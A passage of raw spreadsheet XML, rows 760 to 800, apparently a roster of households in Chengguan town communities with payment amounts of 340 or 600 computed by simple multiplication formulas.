      <c r="E760" s="14" t="s">
        <v>2045</v>
      </c>
      <c r="F760" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G760" s="14">
        <v>1</v>
      </c>
      <c r="H760" s="14">
        <v>340</v>
      </c>
      <c r="I760" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J760" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K760" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="761" ht="23" customHeight="1" spans="1:11">
      <c r="A761" s="13" t="s">
        <v>2046</v>
      </c>
      <c r="B761" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C761" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D761" s="14" t="s">
        <v>2047</v>
      </c>
      <c r="E761" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F761" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G761" s="14">
        <v>1</v>
      </c>
      <c r="H761" s="14">
        <v>340</v>
      </c>
      <c r="I761" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J761" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K761" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="762" ht="23" customHeight="1" spans="1:11">
      <c r="A762" s="13" t="s">
        <v>2048</v>
      </c>
      <c r="B762" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C762" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D762" s="14" t="s">
        <v>2049</v>
      </c>
      <c r="E762" s="14" t="s">
        <v>2050</v>
      </c>
      <c r="F762" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G762" s="14">
        <v>1</v>
      </c>
      <c r="H762" s="14">
        <v>340</v>
      </c>
      <c r="I762" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J762" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K762" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="763" ht="23" customHeight="1" spans="1:11">
      <c r="A763" s="13" t="s">
        <v>2051</v>
      </c>
      <c r="B763" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C763" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D763" s="14" t="s">
        <v>2052</v>
      </c>
      <c r="E763" s="14" t="s">
        <v>2053</v>
      </c>
      <c r="F763" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G763" s="14">
        <v>1</v>
      </c>
      <c r="H763" s="14">
        <v>340</v>
      </c>
      <c r="I763" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J763" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K763" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="764" ht="23" customHeight="1" spans="1:11">
      <c r="A764" s="13" t="s">
        <v>2054</v>
      </c>
      <c r="B764" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C764" s="14" t="s">
        <v>2055</v>
      </c>
      <c r="D764" s="14" t="s">
        <v>2056</v>
      </c>
      <c r="E764" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F764" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G764" s="14">
        <v>1</v>
      </c>
      <c r="H764" s="14">
        <v>340</v>
      </c>
      <c r="I764" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J764" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K764" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="765" ht="23" customHeight="1" spans="1:11">
      <c r="A765" s="13" t="s">
        <v>2057</v>
      </c>
      <c r="B765" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C765" s="14" t="s">
        <v>2058</v>
      </c>
      <c r="D765" s="14" t="s">
        <v>2059</v>
      </c>
      <c r="E765" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F765" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G765" s="14">
        <v>1</v>
      </c>
      <c r="H765" s="14">
        <v>340</v>
      </c>
      <c r="I765" s="14">
        <f t="shared" si="33"/>
        <v>340</v>
      </c>
      <c r="J765" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K765" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="766" ht="23" customHeight="1" spans="1:11">
      <c r="A766" s="13" t="s">
        <v>2060</v>
      </c>
      <c r="B766" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C766" s="14" t="s">
        <v>2058</v>
      </c>
      <c r="D766" s="14" t="s">
        <v>2061</v>
      </c>
      <c r="E766" s="14" t="s">
        <v>242</v>
      </c>
      <c r="F766" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G766" s="14">
        <v>2</v>
      </c>
      <c r="H766" s="14">
        <v>300</v>
      </c>
      <c r="I766" s="14">
        <f t="shared" si="33"/>
        <v>600</v>
      </c>
      <c r="J766" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K766" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="767" ht="23" customHeight="1" spans="1:11">
      <c r="A767" s="13" t="s">
        <v>2062</v>
      </c>
      <c r="B767" s="14" t="str">
        <f>B766</f>
        <v>城关镇</v>
      </c>
      <c r="C767" s="14" t="str">
        <f>C766</f>
        <v>城关镇中华社区</v>
      </c>
      <c r="D767" s="23" t="s">
        <v>2063</v>
      </c>
      <c r="E767" s="19" t="s">
        <v>292</v>
      </c>
      <c r="F767" s="14" t="str">
        <f>F766</f>
        <v>4113210108</v>
      </c>
      <c r="G767" s="14"/>
      <c r="H767" s="14"/>
      <c r="I767" s="14"/>
      <c r="J767" s="14"/>
      <c r="K767" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="768" ht="23" customHeight="1" spans="1:11">
      <c r="A768" s="13" t="s">
        <v>2064</v>
      </c>
      <c r="B768" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C768" s="14" t="s">
        <v>2065</v>
      </c>
      <c r="D768" s="14" t="s">
        <v>2066</v>
      </c>
      <c r="E768" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F768" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G768" s="14">
        <v>1</v>
      </c>
      <c r="H768" s="14">
        <v>340</v>
      </c>
      <c r="I768" s="14">
        <f t="shared" ref="I768:I775" si="34">H768*G768</f>
        <v>340</v>
      </c>
      <c r="J768" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K768" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="769" ht="23" customHeight="1" spans="1:11">
      <c r="A769" s="13" t="s">
        <v>2067</v>
      </c>
      <c r="B769" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C769" s="14" t="s">
        <v>2068</v>
      </c>
      <c r="D769" s="14" t="s">
        <v>2069</v>
      </c>
      <c r="E769" s="14" t="s">
        <v>261</v>
      </c>
      <c r="F769" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G769" s="14">
        <v>1</v>
      </c>
      <c r="H769" s="14">
        <v>340</v>
      </c>
      <c r="I769" s="14">
        <f t="shared" si="34"/>
        <v>340</v>
      </c>
      <c r="J769" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K769" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="770" ht="23" customHeight="1" spans="1:11">
      <c r="A770" s="13" t="s">
        <v>2070</v>
      </c>
      <c r="B770" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C770" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D770" s="14" t="s">
        <v>2072</v>
      </c>
      <c r="E770" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F770" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G770" s="14">
        <v>1</v>
      </c>
      <c r="H770" s="14">
        <v>340</v>
      </c>
      <c r="I770" s="14">
        <f t="shared" si="34"/>
        <v>340</v>
      </c>
      <c r="J770" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K770" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="771" ht="23" customHeight="1" spans="1:11">
      <c r="A771" s="13" t="s">
        <v>2073</v>
      </c>
      <c r="B771" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C771" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D771" s="14" t="s">
        <v>2075</v>
      </c>
      <c r="E771" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F771" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G771" s="14">
        <v>1</v>
      </c>
      <c r="H771" s="14">
        <v>340</v>
      </c>
      <c r="I771" s="14">
        <f t="shared" si="34"/>
        <v>340</v>
      </c>
      <c r="J771" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K771" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="772" ht="23" customHeight="1" spans="1:11">
      <c r="A772" s="13" t="s">
        <v>2076</v>
      </c>
      <c r="B772" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C772" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D772" s="14" t="s">
        <v>2078</v>
      </c>
      <c r="E772" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F772" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G772" s="14">
        <v>1</v>
      </c>
      <c r="H772" s="14">
        <v>340</v>
      </c>
      <c r="I772" s="14">
        <f t="shared" si="34"/>
        <v>340</v>
      </c>
      <c r="J772" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K772" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="773" ht="23" customHeight="1" spans="1:11">
      <c r="A773" s="13" t="s">
        <v>2079</v>
      </c>
      <c r="B773" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C773" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D773" s="14" t="s">
        <v>2080</v>
      </c>
      <c r="E773" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F773" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G773" s="14">
        <v>1</v>
      </c>
      <c r="H773" s="14">
        <v>340</v>
      </c>
      <c r="I773" s="14">
        <f t="shared" si="34"/>
        <v>340</v>
      </c>
      <c r="J773" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K773" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="774" ht="23" customHeight="1" spans="1:11">
      <c r="A774" s="13" t="s">
        <v>2081</v>
      </c>
      <c r="B774" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C774" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D774" s="14" t="s">
        <v>2083</v>
      </c>
      <c r="E774" s="14" t="s">
        <v>1093</v>
      </c>
      <c r="F774" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G774" s="14">
        <v>1</v>
      </c>
      <c r="H774" s="14">
        <v>340</v>
      </c>
      <c r="I774" s="14">
        <f t="shared" si="34"/>
        <v>340</v>
      </c>
      <c r="J774" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K774" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="775" ht="23" customHeight="1" spans="1:11">
      <c r="A775" s="13" t="s">
        <v>2084</v>
      </c>
      <c r="B775" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C775" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D775" s="14" t="s">
        <v>2085</v>
      </c>
      <c r="E775" s="14" t="s">
        <v>252</v>
      </c>
      <c r="F775" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G775" s="14">
        <v>2</v>
      </c>
      <c r="H775" s="14">
        <v>300</v>
      </c>
      <c r="I775" s="14">
        <f t="shared" si="34"/>
        <v>600</v>
      </c>
      <c r="J775" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K775" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="776" ht="23" customHeight="1" spans="1:11">
      <c r="A776" s="13" t="s">
        <v>2086</v>
      </c>
      <c r="B776" s="14" t="str">
        <f>B775</f>
        <v>城关镇</v>
      </c>
      <c r="C776" s="14" t="str">
        <f>C775</f>
        <v>北外社区</v>
      </c>
      <c r="D776" s="23" t="s">
        <v>2087</v>
      </c>
      <c r="E776" s="19" t="s">
        <v>1805</v>
      </c>
      <c r="F776" s="14" t="str">
        <f>F775</f>
        <v>4113210102</v>
      </c>
      <c r="G776" s="14"/>
      <c r="H776" s="14"/>
      <c r="I776" s="14"/>
      <c r="J776" s="14"/>
      <c r="K776" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="777" ht="23" customHeight="1" spans="1:11">
      <c r="A777" s="13" t="s">
        <v>2088</v>
      </c>
      <c r="B777" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C777" s="14" t="s">
        <v>1876</v>
      </c>
      <c r="D777" s="14" t="s">
        <v>2089</v>
      </c>
      <c r="E777" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F777" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G777" s="14">
        <v>1</v>
      </c>
      <c r="H777" s="14">
        <v>340</v>
      </c>
      <c r="I777" s="14">
        <f>H777*G777</f>
        <v>340</v>
      </c>
      <c r="J777" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K777" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="778" ht="23" customHeight="1" spans="1:11">
      <c r="A778" s="13" t="s">
        <v>2090</v>
      </c>
      <c r="B778" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C778" s="14" t="s">
        <v>1714</v>
      </c>
      <c r="D778" s="14" t="s">
        <v>2091</v>
      </c>
      <c r="E778" s="14" t="s">
        <v>2092</v>
      </c>
      <c r="F778" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G778" s="14">
        <v>1</v>
      </c>
      <c r="H778" s="14">
        <v>340</v>
      </c>
      <c r="I778" s="14">
        <f>H778*G778</f>
        <v>340</v>
      </c>
      <c r="J778" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K778" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="779" ht="23" customHeight="1" spans="1:11">
      <c r="A779" s="13" t="s">
        <v>2093</v>
      </c>
      <c r="B779" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C779" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D779" s="14" t="s">
        <v>2094</v>
      </c>
      <c r="E779" s="14" t="s">
        <v>2095</v>
      </c>
      <c r="F779" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G779" s="14">
        <v>2</v>
      </c>
      <c r="H779" s="14">
        <v>300</v>
      </c>
      <c r="I779" s="14">
        <f>H779*G779</f>
        <v>600</v>
      </c>
      <c r="J779" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K779" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="780" ht="23" customHeight="1" spans="1:11">
      <c r="A780" s="13" t="s">
        <v>2096</v>
      </c>
      <c r="B780" s="14" t="str">
        <f>B779</f>
        <v>城关镇</v>
      </c>
      <c r="C780" s="14" t="str">
        <f>C779</f>
        <v>西北社区</v>
      </c>
      <c r="D780" s="18" t="s">
        <v>2097</v>
      </c>
      <c r="E780" s="18" t="s">
        <v>2098</v>
      </c>
      <c r="F780" s="14" t="str">
        <f>F779</f>
        <v>4113210106</v>
      </c>
      <c r="G780" s="14"/>
      <c r="H780" s="14"/>
      <c r="I780" s="14"/>
      <c r="J780" s="14"/>
      <c r="K780" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="781" ht="23" customHeight="1" spans="1:11">
      <c r="A781" s="13" t="s">
        <v>2099</v>
      </c>
      <c r="B781" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C781" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D781" s="14" t="s">
        <v>2100</v>
      </c>
      <c r="E781" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F781" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G781" s="14">
        <v>1</v>
      </c>
      <c r="H781" s="14">
        <v>340</v>
      </c>
      <c r="I781" s="14">
        <f t="shared" ref="I781:I787" si="35">H781*G781</f>
        <v>340</v>
      </c>
      <c r="J781" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K781" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="782" ht="23" customHeight="1" spans="1:11">
      <c r="A782" s="13" t="s">
        <v>2101</v>
      </c>
      <c r="B782" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C782" s="14" t="s">
        <v>247</v>
      </c>
      <c r="D782" s="14" t="s">
        <v>2102</v>
      </c>
      <c r="E782" s="14" t="s">
        <v>1902</v>
      </c>
      <c r="F782" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G782" s="14">
        <v>1</v>
      </c>
      <c r="H782" s="14">
        <v>340</v>
      </c>
      <c r="I782" s="14">
        <f t="shared" si="35"/>
        <v>340</v>
      </c>
      <c r="J782" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K782" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="783" ht="23" customHeight="1" spans="1:11">
      <c r="A783" s="13" t="s">
        <v>2103</v>
      </c>
      <c r="B783" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C783" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D783" s="14" t="s">
        <v>2104</v>
      </c>
      <c r="E783" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F783" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G783" s="14">
        <v>1</v>
      </c>
      <c r="H783" s="14">
        <v>340</v>
      </c>
      <c r="I783" s="14">
        <f t="shared" si="35"/>
        <v>340</v>
      </c>
      <c r="J783" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K783" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="784" ht="23" customHeight="1" spans="1:11">
      <c r="A784" s="13" t="s">
        <v>2105</v>
      </c>
      <c r="B784" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C784" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D784" s="14" t="s">
        <v>2106</v>
      </c>
      <c r="E784" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F784" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G784" s="14">
        <v>1</v>
      </c>
      <c r="H784" s="14">
        <v>340</v>
      </c>
      <c r="I784" s="14">
        <f t="shared" si="35"/>
        <v>340</v>
      </c>
      <c r="J784" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K784" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="785" ht="23" customHeight="1" spans="1:11">
      <c r="A785" s="13" t="s">
        <v>2107</v>
      </c>
      <c r="B785" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C785" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D785" s="14" t="s">
        <v>2108</v>
      </c>
      <c r="E785" s="14" t="s">
        <v>2109</v>
      </c>
      <c r="F785" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G785" s="14">
        <v>1</v>
      </c>
      <c r="H785" s="14">
        <v>340</v>
      </c>
      <c r="I785" s="14">
        <f t="shared" si="35"/>
        <v>340</v>
      </c>
      <c r="J785" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K785" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="786" ht="23" customHeight="1" spans="1:11">
      <c r="A786" s="13" t="s">
        <v>2110</v>
      </c>
      <c r="B786" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C786" s="14" t="s">
        <v>1813</v>
      </c>
      <c r="D786" s="14" t="s">
        <v>2111</v>
      </c>
      <c r="E786" s="14" t="s">
        <v>2112</v>
      </c>
      <c r="F786" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G786" s="14">
        <v>1</v>
      </c>
      <c r="H786" s="14">
        <v>340</v>
      </c>
      <c r="I786" s="14">
        <f t="shared" si="35"/>
        <v>340</v>
      </c>
      <c r="J786" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K786" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="787" ht="23" customHeight="1" spans="1:11">
      <c r="A787" s="13" t="s">
        <v>2113</v>
      </c>
      <c r="B787" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C787" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D787" s="14" t="s">
        <v>2114</v>
      </c>
      <c r="E787" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F787" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G787" s="14">
        <v>2</v>
      </c>
      <c r="H787" s="14">
        <v>300</v>
      </c>
      <c r="I787" s="14">
        <f t="shared" si="35"/>
        <v>600</v>
      </c>
      <c r="J787" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K787" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="788" ht="23" customHeight="1" spans="1:11">
      <c r="A788" s="13" t="s">
        <v>2115</v>
      </c>
      <c r="B788" s="14" t="str">
        <f>B787</f>
        <v>城关镇</v>
      </c>
      <c r="C788" s="14" t="str">
        <f>C787</f>
        <v>西北社区</v>
      </c>
      <c r="D788" s="22" t="s">
        <v>2116</v>
      </c>
      <c r="E788" s="22" t="s">
        <v>288</v>
      </c>
      <c r="F788" s="14" t="str">
        <f>F787</f>
        <v>4113210106</v>
      </c>
      <c r="G788" s="14"/>
      <c r="H788" s="14"/>
      <c r="I788" s="14"/>
      <c r="J788" s="14"/>
      <c r="K788" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="789" ht="23" customHeight="1" spans="1:11">
      <c r="A789" s="13" t="s">
        <v>2117</v>
      </c>
      <c r="B789" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C789" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D789" s="14" t="s">
        <v>2118</v>
      </c>
      <c r="E789" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F789" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G789" s="14">
        <v>1</v>
      </c>
      <c r="H789" s="14">
        <v>340</v>
      </c>
      <c r="I789" s="14">
        <f t="shared" ref="I789:I803" si="36">H789*G789</f>
        <v>340</v>
      </c>
      <c r="J789" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K789" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="790" ht="23" customHeight="1" spans="1:11">
      <c r="A790" s="13" t="s">
        <v>2119</v>
      </c>
      <c r="B790" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C790" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D790" s="14" t="s">
        <v>2120</v>
      </c>
      <c r="E790" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F790" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G790" s="14">
        <v>1</v>
      </c>
      <c r="H790" s="14">
        <v>340</v>
      </c>
      <c r="I790" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J790" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K790" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="791" ht="23" customHeight="1" spans="1:11">
      <c r="A791" s="13" t="s">
        <v>2121</v>
      </c>
      <c r="B791" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C791" s="14" t="s">
        <v>2122</v>
      </c>
      <c r="D791" s="14" t="s">
        <v>2123</v>
      </c>
      <c r="E791" s="14" t="s">
        <v>2124</v>
      </c>
      <c r="F791" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G791" s="14">
        <v>1</v>
      </c>
      <c r="H791" s="14">
        <v>340</v>
      </c>
      <c r="I791" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J791" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K791" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="792" ht="23" customHeight="1" spans="1:11">
      <c r="A792" s="13" t="s">
        <v>2125</v>
      </c>
      <c r="B792" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C792" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D792" s="14" t="s">
        <v>2126</v>
      </c>
      <c r="E792" s="14" t="s">
        <v>2127</v>
      </c>
      <c r="F792" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G792" s="14">
        <v>1</v>
      </c>
      <c r="H792" s="14">
        <v>340</v>
      </c>
      <c r="I792" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J792" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K792" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="793" ht="23" customHeight="1" spans="1:11">
      <c r="A793" s="13" t="s">
        <v>2128</v>
      </c>
      <c r="B793" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C793" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D793" s="14" t="s">
        <v>2129</v>
      </c>
      <c r="E793" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F793" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G793" s="14">
        <v>1</v>
      </c>
      <c r="H793" s="14">
        <v>340</v>
      </c>
      <c r="I793" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J793" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K793" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="794" ht="23" customHeight="1" spans="1:11">
      <c r="A794" s="13" t="s">
        <v>2130</v>
      </c>
      <c r="B794" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C794" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D794" s="14" t="s">
        <v>2131</v>
      </c>
      <c r="E794" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F794" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G794" s="14">
        <v>1</v>
      </c>
      <c r="H794" s="14">
        <v>340</v>
      </c>
      <c r="I794" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J794" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K794" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="795" ht="23" customHeight="1" spans="1:11">
      <c r="A795" s="13" t="s">
        <v>2132</v>
      </c>
      <c r="B795" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C795" s="14" t="s">
        <v>219</v>
      </c>
      <c r="D795" s="14" t="s">
        <v>2133</v>
      </c>
      <c r="E795" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F795" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G795" s="14">
        <v>1</v>
      </c>
      <c r="H795" s="14">
        <v>340</v>
      </c>
      <c r="I795" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J795" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K795" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="796" ht="23" customHeight="1" spans="1:11">
      <c r="A796" s="13" t="s">
        <v>2134</v>
      </c>
      <c r="B796" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C796" s="14" t="s">
        <v>2135</v>
      </c>
      <c r="D796" s="14" t="s">
        <v>2136</v>
      </c>
      <c r="E796" s="14" t="s">
        <v>883</v>
      </c>
      <c r="F796" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G796" s="14">
        <v>1</v>
      </c>
      <c r="H796" s="14">
        <v>340</v>
      </c>
      <c r="I796" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J796" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K796" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="797" ht="23" customHeight="1" spans="1:11">
      <c r="A797" s="13" t="s">
        <v>2137</v>
      </c>
      <c r="B797" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C797" s="14" t="s">
        <v>2135</v>
      </c>
      <c r="D797" s="14" t="s">
        <v>2138</v>
      </c>
      <c r="E797" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F797" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G797" s="14">
        <v>1</v>
      </c>
      <c r="H797" s="14">
        <v>340</v>
      </c>
      <c r="I797" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J797" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K797" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="798" ht="23" customHeight="1" spans="1:11">
      <c r="A798" s="13" t="s">
        <v>2139</v>
      </c>
      <c r="B798" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C798" s="14" t="s">
        <v>2140</v>
      </c>
      <c r="D798" s="14" t="s">
        <v>2141</v>
      </c>
      <c r="E798" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F798" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G798" s="14">
        <v>1</v>
      </c>
      <c r="H798" s="14">
        <v>340</v>
      </c>
      <c r="I798" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J798" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K798" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="799" ht="23" customHeight="1" spans="1:11">
      <c r="A799" s="13" t="s">
        <v>2142</v>
      </c>
      <c r="B799" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C799" s="14" t="s">
        <v>2140</v>
      </c>
      <c r="D799" s="14" t="s">
        <v>2143</v>
      </c>
      <c r="E799" s="14" t="s">
        <v>2144</v>
      </c>
      <c r="F799" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G799" s="14">
        <v>1</v>
      </c>
      <c r="H799" s="14">
        <v>340</v>
      </c>
      <c r="I799" s="14">
        <f t="shared" si="36"/>
        <v>340</v>
      </c>
      <c r="J799" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K799" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="800" ht="23" customHeight="1" spans="1:11">
      <c r="A800" s="13" t="s">
        <v>2145</v>
